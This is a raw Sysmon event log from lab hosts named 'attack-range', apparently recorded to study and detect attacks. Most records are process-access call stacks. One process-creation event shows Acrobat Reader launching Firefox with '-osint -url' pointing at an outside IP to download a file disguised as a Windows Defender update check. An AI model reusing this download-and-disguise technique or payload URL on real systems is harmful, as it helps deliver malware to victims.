12:30:35.182{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8326916C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000047839Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:35.182{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8326916C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000047838Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:35.182{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8326916C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000047837Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:35.182{FE4C2B44-DDF4-63C7-A004-00000000AF02}47004228C:\Windows\system32\csrss.exe{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304C:\Program Files\Mozilla Firefox\firefox.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000047836Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:35.182{FE4C2B44-E66B-63C7-9A06-00000000AF02}53045360C:\Program Files\Mozilla Firefox\firefox.exe{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304C:\Program Files\Mozilla Firefox\firefox.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7424|C:\Windows\System32\KERNELBASE.dll+24890|C:\Windows\System32\KERNELBASE.dll+6e193|C:\Windows\System32\ADVAPI32.dll+188af|C:\Program Files\Mozilla Firefox\firefox.exe+22349|C:\Program Files\Mozilla Firefox\firefox.exe+1e523|C:\Program Files\Mozilla Firefox\firefox.exe+2c9f8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000047835Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:35.193{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304C:\Program Files\Mozilla Firefox\firefox.exe109.0FirefoxFirefoxMozilla Corporationfirefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -osint -url http://45.139.105.143/d/rsWinDefendUpdateCheck.exeC:\Windows\system32\ATTACKRANGE\Administrator{FE4C2B44-DDF6-63C7-BDF1-300000000000}0x30f1bd2MediumMD5=66A6B001D806D3117BBA41DD55C08DE0,SHA256=0FC5FD25E5CB032AF0E867B74AD8FCB3A0F5803F3C661E398D5A03448C5CA946,IMPHASH=B9CD654B3D499FE4AD9B5E6D464FD125{FE4C2B44-E66B-63C7-9A06-00000000AF02}5304C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -osint -url "http://45.139.105.143/d/rsWinDefendUpdateCheck.exe" 10341000x800000000000000047834Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:35.182{FE4C2B44-D9F5-63C7-1200-00000000AF02}7565760C:\Windows\System32\svchost.exe{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304C:\Program Files\Mozilla Firefox\firefox.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000047833Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:35.182{FE4C2B44-E66B-63C7-9A06-00000000AF02}53045360C:\Program Files\Mozilla Firefox\firefox.exe{FE4C2B44-E64A-63C7-8706-00000000AF02}1400C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Program Files\Mozilla Firefox\firefox.exe+2096b|C:\Program Files\Mozilla Firefox\firefox.exe+1e523|C:\Program Files\Mozilla Firefox\firefox.exe+2c9f8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000047832Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:35.151{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8326916C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000047831Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:35.151{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8326916C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000047830Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:35.151{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8326916C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000047829Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:35.151{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8326916C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000047828Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:35.151{FE4C2B44-DDF4-63C7-A004-00000000AF02}47004228C:\Windows\system32\csrss.exe{FE4C2B44-E66B-63C7-9A06-00000000AF02}5304C:\Program Files\Mozilla Firefox\firefox.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000047827Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:35.151{FE4C2B44-E64A-63C7-8706-00000000AF02}14003268C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe{FE4C2B44-E66B-63C7-9A06-00000000AF02}5304C:\Program Files\Mozilla Firefox\firefox.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7424|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9888(wow64)|C:\Windows\System32\KERNELBASE.dll+d856c(wow64)|C:\Windows\System32\windows.storage.dll+1c6716(wow64)|C:\Windows\System32\windows.storage.dll+1c63d1(wow64)|C:\Windows\System32\windows.storage.dll+1c64a3(wow64)|C:\Windows\System32\windows.storage.dll+1c7175(wow64)|C:\Windows\System32\windows.storage.dll+1c6021(wow64)|C:\Windows\System32\windows.storage.dll+1c8182(wow64)|C:\Windows\System32\windows.storage.dll+1c85ec(wow64)|C:\Windows\System32\windows.storage.dll+1c8035(wow64)|C:\Windows\System32\SHELL32.dll+1a9394(wow64)|C:\Windows\System32\SHELL32.dll+1a926e(wow64)|C:\Windows\System32\SHELL32.dll+1431da(wow64)|C:\Windows\System32\shcore.dll+2fffa(wow64) 154100x800000000000000047826Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:35.156{FE4C2B44-E66B-63C7-9A06-00000000AF02}5304C:\Program Files\Mozilla Firefox\firefox.exe109.0FirefoxFirefoxMozilla Corporationfirefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -osint -url "http://45.139.105.143/d/rsWinDefendUpdateCheck.exe"C:\Windows\system32\ATTACKRANGE\Administrator{FE4C2B44-DDF6-63C7-BDF1-300000000000}0x30f1bd2HighMD5=66A6B001D806D3117BBA41DD55C08DE0,SHA256=0FC5FD25E5CB032AF0E867B74AD8FCB3A0F5803F3C661E398D5A03448C5CA946,IMPHASH=B9CD654B3D499FE4AD9B5E6D464FD125{FE4C2B44-E64A-63C7-8706-00000000AF02}1400C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" 10341000x800000000000000047825Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:35.151{FE4C2B44-D9F5-63C7-1200-00000000AF02}7565760C:\Windows\System32\svchost.exe{FE4C2B44-E66B-63C7-9A06-00000000AF02}5304C:\Program Files\Mozilla Firefox\firefox.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000047824Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:35.124{FE4C2B44-DDF9-63C7-C404-00000000AF02}52003472C:\Windows\Explorer.EXE{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\SHELL32.dll+8957f|C:\Windows\System32\SHELL32.dll+8a4a5|C:\Windows\Explorer.EXE+3c648|C:\Windows\Explorer.EXE+3c4d4|C:\Windows\Explorer.EXE+3c441|C:\Windows\System32\windows.storage.dll+12703f|C:\Windows\System32\windows.storage.dll+125dbf|C:\Windows\System32\windows.storage.dll+19d7df|C:\Windows\System32\SHCORE.dll+367b6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000047823Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:35.124{FE4C2B44-DDF9-63C7-C404-00000000AF02}52003472C:\Windows\Explorer.EXE{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\SHELL32.dll+8a3be|C:\Windows\Explorer.EXE+3c648|C:\Windows\Explorer.EXE+3c4d4|C:\Windows\Explorer.EXE+3c441|C:\Windows\System32\windows.storage.dll+12703f|C:\Windows\System32\windows.storage.dll+125dbf|C:\Windows\System32\windows.storage.dll+19d7df|C:\Windows\System32\SHCORE.dll+367b6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000047822Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:35.124{FE4C2B44-DDF9-63C7-C404-00000000AF02}52003472C:\Windows\Explorer.EXE{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\SHELL32.dll+897d4|C:\Windows\System32\SHELL32.dll+8a387|C:\Windows\Explorer.EXE+3c648|C:\Windows\Explorer.EXE+3c4d4|C:\Windows\Explorer.EXE+3c441|C:\Windows\System32\windows.storage.dll+12703f|C:\Windows\System32\windows.storage.dll+125dbf|C:\Windows\System32\windows.storage.dll+19d7df|C:\Windows\System32\SHCORE.dll+367b6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x800000000000000018892Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:30:36.661{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=117D2A33C9B616325DD9DCF3E98BA464,SHA256=A5AE2802889F9C1CD57388E35AA97624866BA1E38390967E8D8337A706C74415,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000048003Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:36.997{FE4C2B44-E66B-63C7-9B06-00000000AF02}33044516C:\Program Files\Mozilla Firefox\firefox.exe{FE4C2B44-E66C-63C7-9E06-00000000AF02}5664C:\Program Files\Mozilla Firefox\firefox.exe0x2200C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Program Files\Mozilla Firefox\xul.dll+269b6|C:\Program Files\Mozilla Firefox\xul.dll+e8dca7|C:\Program Files\Mozilla Firefox\xul.dll+e87879|C:\Program Files\Mozilla Firefox\xul.dll+e77459|C:\Program Files\Mozilla Firefox\xul.dll+e7653c|C:\Program Files\Mozilla Firefox\xul.dll+e78bb2|C:\Program Files\Mozilla Firefox\xul.dll+c2d887|C:\Program Files\Mozilla Firefox\xul.dll+c2ac3d|C:\Program Files\Mozilla Firefox\xul.dll+24fe6b|C:\Program Files\Mozilla Firefox\xul.dll+24f993|C:\Program Files\Mozilla Firefox\xul.dll+105ab0f|C:\Program Files\Mozilla Firefox\xul.dll+1882709|C:\Program Files\Mozilla Firefox\xul.dll+1880b50|C:\Program Files\Mozilla Firefox\xul.dll+c2d021|C:\Program Files\Mozilla Firefox\xul.dll+236871|C:\Program Files\Mozilla Firefox\xul.dll+ce82ce|C:\Program Files\Mozilla Firefox\xul.dll+1870580|C:\Program Files\Mozilla Firefox\xul.dll+1822181|C:\Program Files\Mozilla Firefox\xul.dll+1d02fbf|C:\Program Files\Mozilla Firefox\xul.dll+1e7190e|C:\Program Files\Mozilla Firefox\xul.dll+1822568|C:\Program Files\Mozilla Firefox\xul.dll+1d02fbf 10341000x800000000000000048002Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:36.995{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E66C-63C7-9D06-00000000AF02}4960C:\Program Files\Mozilla Firefox\firefox.exe0x1010C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 10341000x800000000000000048001Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:36.995{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E66C-63C7-9D06-00000000AF02}4960C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 10341000x800000000000000048000Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:36.995{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E66C-63C7-9D06-00000000AF02}4960C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 10341000x800000000000000047999Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:36.995{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E66C-63C7-9D06-00000000AF02}4960C:\Program Files\Mozilla Firefox\firefox.exe0x1010C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 10341000x800000000000000047998Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:36.995{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E66C-63C7-9D06-00000000AF02}4960C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 10341000x800000000000000047997Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:36.995{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E66C-63C7-9D06-00000000AF02}4960C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 10341000x800000000000000047996Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:36.992{FE4C2B44-E66B-63C7-9B06-00000000AF02}33045548C:\Program Files\Mozilla Firefox\firefox.exe{FE4C2B44-E66C-63C7-9E06-00000000AF02}5664C:\Program Files\Mozilla Firefox\firefox.exe0x101451C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Program Files\Mozilla Firefox\xul.dll+9e834a|C:\Program Files\Mozilla Firefox\xul.dll+ebac4|C:\Program Files\Mozilla Firefox\xul.dll+2581e76|C:\Program Files\Mozilla Firefox\xul.dll+1ab508d|C:\Program Files\Mozilla Firefox\xul.dll+12705|C:\Program Files\Mozilla Firefox\xul.dll+9d10af|C:\Program Files\Mozilla Firefox\xul.dll+12237|C:\Program Files\Mozilla Firefox\xul.dll+9cdfc1|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Program Files\Mozilla Firefox\mozglue.dll+1f968|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000047995Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:36.983{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8326916C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL